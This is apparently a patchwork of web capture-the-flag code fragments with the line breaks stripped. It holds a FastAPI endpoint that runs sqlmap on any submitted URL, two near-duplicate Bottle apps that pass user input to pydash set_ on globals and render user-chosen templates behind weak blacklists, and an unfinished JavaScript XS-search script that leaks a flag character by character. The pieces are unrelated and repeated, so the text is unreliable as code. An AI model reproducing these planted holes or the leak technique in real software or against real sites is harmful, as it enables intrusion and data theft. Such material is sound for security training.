@app.post("/run") async def run(request: Request): data = await request.json() url = data.get("url") if not url: return {"error": "URL is required"} command = f'sqlmap -u {url} --batch --flush-session'
def generate(): process = subprocess.Popen( command.split(), stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=False ) while True: output = process.stdout.readline() if output == '' and process.poll() is not None: break if output: yield output return StreamingResponse(generate(), media_type="text/plain")
def setval(name:str, path:str, value:str)-> Optional[bool]: if name.find("__")>=0: return False for word in __forbidden_name__: if name==word: return False for word in __forbidden_path__: if path.find(word)>=0: return False obj=globals()[name] try: pydash.set_(obj,path,value) except: return False return True
@bottle.post('/setValue') def set_value(): name = bottle.request.query.get('name') path=bottle.request.json.get('path') if not isinstance(path,str): return "no" if len(name)>6 or len(path)>32: return "no" value=bottle.request.json.get('value') return "yes" if setval(name, path, value) else "no"
@bottle.get('/render') def render_template(): path=bottle.request.query.get('path') if len(path)>10: return "hacker" blacklist=["{","}","."] for c in path: if c in blacklist: return "hacker" return bottle.template(path) bottle.run(host='0.0.0.0', port=8000)
def setval(name:str, path:str, value:str)-> Optional[bool]: if name.find("__")>=0: return False for word in __forbidden_name__: if name==word: return False for word in __forbidden_path__: if path.find(word)>=0: return False obj=globals()[name] try: pydash.set_(obj,path,value) except: return False return True
@bottle.post('/setValue') def set_value(): name = bottle.request.query.get('name') path=bottle.request.json.get('path') if not isinstance(path,str): return "no" if len(name)>6 or len(path)>32: return "no" value=bottle.request.json.get('value') return "yes" if setval(name, path, value) else "no"
@bottle.get('/render') def render_template(): path=bottle.request.query.get('path') if len(path)>10: return "hacker" blacklist=["{","}",".","%","<",">","_"] for c in path: if c in blacklist: return "hacker" return bottle.template(path) bottle.run(host='0.0.0.0', port=8000)
def _raise_if_restricted_key(key): # Prevent access to restricted keys for security reasons. if key in RESTRICTED_KEYS: raise KeyError(f"access to restricted key {key!r} is not allowed")
<body> <script> let currentFlag = "nctf{"; const chars = "abcdef0123456789-{}";
function sleep(ms) { return new Promise(resolve => setTimeout(resolve, ms)); }
function checkCharacter(char) { return new Promise((resolve) => { let script = document.createElement('script'); script.src = `http://0.0.0.0:8000/internal/search?s=${currentFlag}${char}`;